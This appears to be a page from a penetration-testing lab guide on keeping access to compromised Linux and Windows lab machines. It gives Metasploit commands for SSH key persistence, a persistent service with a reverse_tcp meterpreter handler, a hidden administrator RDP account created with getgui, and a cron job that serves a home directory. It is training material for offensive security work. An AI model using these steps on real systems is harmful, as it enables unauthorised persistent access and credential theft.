Persistence

SSH Key Persistence

We can also upgrade this command shell session to a meterpreter session by running the following command:

Command:

sessions -u 3

Now that we have been able to elevate our privileges on the target system, we can begin exploring the process of establishing persistence.

The best Metasploit module that can be used to establish persistent access on a Linux target is the sshkey_persistence module.

We can load the module by running the following command:

use post/linux/manage/sshkey_persistence

We will now need to configure the module options, more specifically, we will need to set the SESSION ID and CREATESSHFOLDER options. This can be done by running the following commands:

set SESSION 4

Note: In your case, the SESSION ID will be different.

set CREATESSHFOLDER true

After configuring the module options, we can execute the module by running the following command:

exploit

As shown in the following screenshot, the module runs successfully and will add a public SSH key to the authorized_keys file in the home directory of all user and service accounts.

SSH Private Key:

/root/.msf4/loot/20240716164352_default_192.217.38.3_id_rsa_606834.txt

To use the private key, copy the key and save it as a new file, in this case, we will be saving it in the home directory of the root user on the Kali Linux system as ssh_key.

cp /root/.msf4/loot/20240716164352_default_192.217.38.3_id_rsa_606834.txt ssh_key

We will then need to assign the appropriate permissions to the file, this can be done by running the following commands:

chmod 0400 ssh_key

We can now authenticate with the target using the private key via SSH by running the following command:

ssh -i ssh_key [email protected]

As shown in the following screenshot, the authentication with the private key is successful and we have successfully been able to establish persistent access to the Linux target by adding our public key to the authorized_keys file of over user account, consequently allowing us to authenticate with the target via SSH without providing a password.

SSH private key copy

Enumerate files present in home directory.

ls -al

SSH key pair is present in the “.ssh” directory.

Exit SSH session and copy ssh private key to attacker machine.

scp [email protected]:~/.ssh/id_rsa .
Enter password “password”.

SSH into student machine and delete the wait file.

ssh [email protected]
Enter password “password”

rm wait

The SSH session is terminated.

SSH into the target machine with the private key.

chmod 400 id_rsa
ssh -i id_rsa [email protected]

Windows Persistent Service Installer

"This Module will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required."

Source: https://www.rapid7.com/db/modules/exploit/windows/local/persistence_service/

Running the service persistence module to maintain access to the compromised machine.

background
use exploit/windows/local/persistence_service
set SESSION 1
exploit

Note:By default persistence, the local exploit module uses the following payload and local port for reverse connection:

Payload: windows/meterpreter/reverse_tcp
LHOST: Attack IP Address.
LPORT: 4444

We have successfully maintained access. Start another msfconsole and run multi handler to re-gain access.

msfconsole -q
use exploit/multi/handler
set LHOST <Attacker Kali Machine IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
exploit

Switch back to the active meterpreter session and reboot the machine.

session -i 1
reboot

Once the machine reboots we would expect a new meterpreter session without re-exploitation. This happened because we have added a malicious executable for maintaining access.

We have received a new meterpreter session with the highest privileged.

Also, the backdoor is running as a service. Even if the session gets killed we would again gain it by re-running the Metasploit multi-handler. In this case, we exit the session and run the handler to gain the session again.

exit
exploit

Maintaining Access: RDP

We have successfully exploited the target vulnerable application and received a meterpreter shell.

Checking the current user.

getuid

We can observe that we are running as an administrator user. Migrate the process in explorer.exe. First, search for the PID of explorer.exe and use the migrate command to migrate the current process in that process.

ps -S explorer.exe
migrate 2764

We have successfully migrated into the explorer.exe process. We are going to maintain access by RDP. We will be creating a user and adding that user to the Administrators group. All this can be done using the "getgui" meterpreter command.

The ‘getgui’ command makes the below changes to the target machine:

Enable RDP service if it’s disabled
Creates new user for an attacker
Hide user from Windows Login screen
Adding created user to "Remote Desktop Users" and "Administrators" groups

Running getgui command to gain remote access.

run getgui -e -u alice -p hack_123321

We have created an “alice” user on the target machine and enabled RDP access.

Access the GUI using the xfreerdp utility.

xfreerdp /u:alice /p:hack_123321 /v:demo.ine.local

Y [Accept the certificate]

We have gained access to the target machine GUI by RDP using the "alice" user. Now, if the machine is rebooted the access would remain the same after the machine comes online.

Local Job Scheduling

Check the running processes.

ps -eaf

Cron service is running.

Create a cron job which will use the SimpleHTTPServer python module to serve the files present in student user’s home directory.

echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron
crontab -i cron
crontab -l

Exit the session.

ssh [email protected]
Enter password “password”

rm wait

Use nmap to scan for open ports. Since the HTTP server was started, port 8000 should be open.

nmap -p- demo.ine.local

PreviousPivoting on Metasploit NextPassword Hash cracking

Last updated 5 hours ago